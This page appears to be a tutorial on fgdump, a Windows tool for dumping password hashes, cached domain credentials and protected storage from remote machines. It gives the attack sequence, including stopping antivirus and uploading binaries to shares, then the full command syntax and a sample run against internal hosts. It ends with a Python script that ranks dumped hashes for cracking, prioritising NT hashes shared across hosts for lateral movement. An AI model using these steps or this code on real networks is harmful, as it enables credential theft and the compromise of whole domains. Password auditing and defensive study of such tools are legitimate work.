Fgdump
Fgdump is a utility for dumping password hashes from Windows NT/2000/XP/2003/Vista
machines. It has all the functionality of pwdump built in and can also do a number
of other useful things, such as grabbing cached domain credentials, executing a
remote executable, and dumping the protected storage on a remote (or local) host.
Users of pwdump are advised to upgrade to this as soon as possible.
Fgdump comes with a number of add-ons:
- fgexec: a remotely installed service that can run a remote executable (this is a little limited).
- pwdump6: an updated version of pwdump3e.
- pstgdump: a protected storage dumper (IE, Outlook Express passwords etc.).
In essence fgdump carries out the following when trying to grab password hashes
from a remote machine:
- Bind to the remote machine/target list using IPC$,
- Stop AV, if it is installed,
- Locate file shares exposed on that machine,
- Find a writable share from the above list and bind it to a local drive,
- Upload fgexec and cachedump,
- Run pwdump (password history dump included),
- Run cachedump,
- Run pstgdump,
- Delete the uploaded files from the file share,
- Unbind the remote file share,
- Restart AV if it was running,
- Unbind from IPC$.
Note that this is a noisy procedure: it writes binaries to a share on the target,
installs a service, and stops and restarts the AV product, all of which leave
traces on the target even though the uploaded files are deleted afterwards.
Note: The current release may have issues if you have another copy of pwdump and
lsaext.dll on the system, so it is best to delete these files. If older versions
of the executable/DLL are found, fgdump may use them and possibly crash the
target system(s).
Installation:
Download the executable from here.
Extract the zip file, that's it.
Execution:
fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename}
Note: Username and Password must be administrator credentials on the target(s).
-t  Tests for the presence of antivirus without actually running the password dumps
-c  Forces fgdump to skip the cache dump
-w  Forces fgdump to skip the password dump
-s  Forces fgdump to skip the protected storage dump
-r  Makes fgdump ignore existing pwdump/cachedump output files. Default: skip a host if they already exist.
-v  Verbose output. Use twice for greater effect
-k  Keeps the pwdump/cachedump going even if antivirus is in an unknown state
-l  Logs all output to logfile
-T  Runs fgdump with the specified number of parallel threads
-h  Name of the single host to perform the dumps against
-f  Reads hosts from a line-separated file
-H  Reads host:username:password from a line-separated file (per-host credentials)
Example Output:
C:\fgdump-1.5.2\Release>fgdump.exe -u hacker -p hard_password -c -f target.txt
fgDump 1.5.2 - fizzgig and the mighty group at foofus.net
****** Written to make j0m0kun's life just a bit easier
Copyright(C) 2006 fizzgig and foofus.net
fgdump comes with ABSOLUTELY NO WARRANTY!
This is free software, and you are welcome to redistribute it under
certain conditions; see the COPYING and README files for more
information.
** Beginning dump on server 192.168.1.17 **
OS (192.168.1.17): Microsoft Windows 2003 Server Service Pack 1 (Build 3790)
Passwords dumped successfully
Failed to dump protected storage (the text returned follows):
Attempting to impersonate user 'hacker'
Failed to impersonate user (LogonUser failed): error 1385
Failed to dump protected storage
** Beginning dump on server 192.168.1.18 **
OS (192.168.1.18): Microsoft Windows 2003 Server Service Pack 1 (Build 3790)
Passwords dumped successfully
Failed to dump protected storage (the text returned follows):
Attempting to impersonate user 'hacker'
Failed to impersonate user (LogonUser failed): error 1385
Failed to dump protected storage
** Beginning dump on server 192.168.1.124 **
OS (192.168.1.124): Microsoft Windows 2000 Server Service Pack 4 (Build 2195)
Failed to dump protected storage (the text returned follows):
Attempting to impersonate user 'hacker'
Failed to impersonate user (LogonUser failed): error 1385
Failed to dump protected storage
Failed servers:
Successful servers:
192.168.1.17
192.168.1.18
192.168.1.124
Total failed: 0
Total successful: 3
C:\fgdump-1.3.2-BETA\Release>dir
26/09/2006 15:20 230 192.168.1.124.cachedump
26/09/2006 15:20 514 192.168.1.124.pwdump
26/09/2006 15:37 605 192.168.1.17.pwdump
26/09/2006 15:37 697 192.168.1.18.pwdump
11/07/2006 15:16 569,344 fgdump.exe
26/09/2006 15:37 64 target.txt
The protected storage failures above are not fatal to the run: error 1385 is
ERROR_LOGON_TYPE_NOT_GRANTED ("the user has not been granted the requested logon
type at this computer"), so pstgdump could not impersonate the supplied account
on those hosts even though the hash dump itself succeeded, and the hosts are still
counted as successful.
The next step would be to import the pwdump files (192.168.1.124.pwdump etc.)
into a program like L0phtcrack and start your attack against the hashes.
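As an added example (written for this page, not fgdump's own code), the Python below triages the per-host .pwdump files before they go to a cracker: it parses the user:rid:lmhash:nthash::: lines, flags empty passwords and stored LM hashes (an LM hash means the password is at most 14 characters, or at most 7 if the second half of the hash is the empty-half constant), and reports NT hashes shared across hosts, which usually indicates a common local administrator password. The sample dumps and their hashes are constructed, and the "_history_" suffix used to recognise password-history entries is an assumed naming convention, not one confirmed from the tool's output.

```python
"""Triage of fgdump/pwdump6 output before cracking (added example, not fgdump code)."""
from collections import defaultdict

# Well-known hashes of the empty password; these are fixed constants.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample dumps (fictitious hashes) in pwdump format, user:rid:lmhash:nthash:::
# The "_history_N" suffix for password-history entries is an assumed naming convention.
SAMPLE_DUMPS = {
    "192.168.1.17": """\
Administrator:500:3cf6ca4b38a1b3c8aad3b435b51404ee:f7c9b9d8e4a3b2c1d0e9f8a7b6c5d4e3:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
""",
    "192.168.1.18": """\
Administrator:500:3cf6ca4b38a1b3c8aad3b435b51404ee:f7c9b9d8e4a3b2c1d0e9f8a7b6c5d4e3:::
jdoe:1002:NO PASSWORD*********************:fedcba9876543210fedcba9876543210:::
Administrator_history_0:500:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
""",
}


def is_hex32(s):
    return len(s) == 32 and all(c in "0123456789abcdef" for c in s)


def parse_pwdump(text):
    """Parse pwdump-format lines into dicts; malformed lines are skipped."""
    entries = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[0]:
            continue
        entries.append({"user": parts[0], "rid": parts[1],
                        "lm": parts[2].lower(), "nt": parts[3].lower()})
    return entries


def lm_status(lm):
    """'none'   : no LM hash stored (empty-password hash or a non-hex placeholder)
       'short'  : second half is the empty-half constant, so the password is <= 7 chars
       'present': LM hash for a password of 8 to 14 characters"""
    if not is_hex32(lm) or lm == EMPTY_LM:
        return "none"
    if lm[16:] == EMPTY_LM[16:]:
        return "short"
    return "present"


def triage(dumps, history_marker="_history_"):
    """dumps: {host: pwdump text}. Returns (findings, reused): findings is a sorted
    list of (host, user, issue); reused maps an NT hash to the sorted (host, user)
    pairs carrying it when it appears on more than one host."""
    findings = []
    by_nt = defaultdict(set)
    for host, text in dumps.items():
        for e in parse_pwdump(text):
            user, nt = e["user"], e["nt"]
            if nt == EMPTY_NT:
                findings.append((host, user, "empty password"))
            status = lm_status(e["lm"])
            if status == "short":
                findings.append((host, user, "LM hash present, password is 7 chars or fewer"))
            elif status == "present":
                findings.append((host, user, "LM hash present, password is 14 chars or fewer"))
            # Password-history entries and blank passwords do not count as reuse.
            if history_marker in user or nt == EMPTY_NT:
                continue
            by_nt[nt].add((host, user))
    reused = {nt: sorted(owners) for nt, owners in by_nt.items()
              if len({h for h, _ in owners}) > 1}
    for owners in reused.values():
        for host, user in owners:
            findings.append((host, user, "NT hash shared with another host"))
    return sorted(findings), reused


if __name__ == "__main__":
    found, shared = triage(SAMPLE_DUMPS)
    for host, user, issue in found:
        print(f"{host:<14} {user:<16} {issue}")
    for nt, owners in shared.items():
        owner_list = ", ".join(f"{h}\\{u}" for h, u in owners)
        print(f"NT {nt} seen on: {owner_list}")
```

To use it on real output, read each host's .pwdump file into the dictionary keyed by hostname in place of SAMPLE_DUMPS; accounts flagged as sharing an NT hash are the ones to crack first, since one recovered password then opens every host in that set.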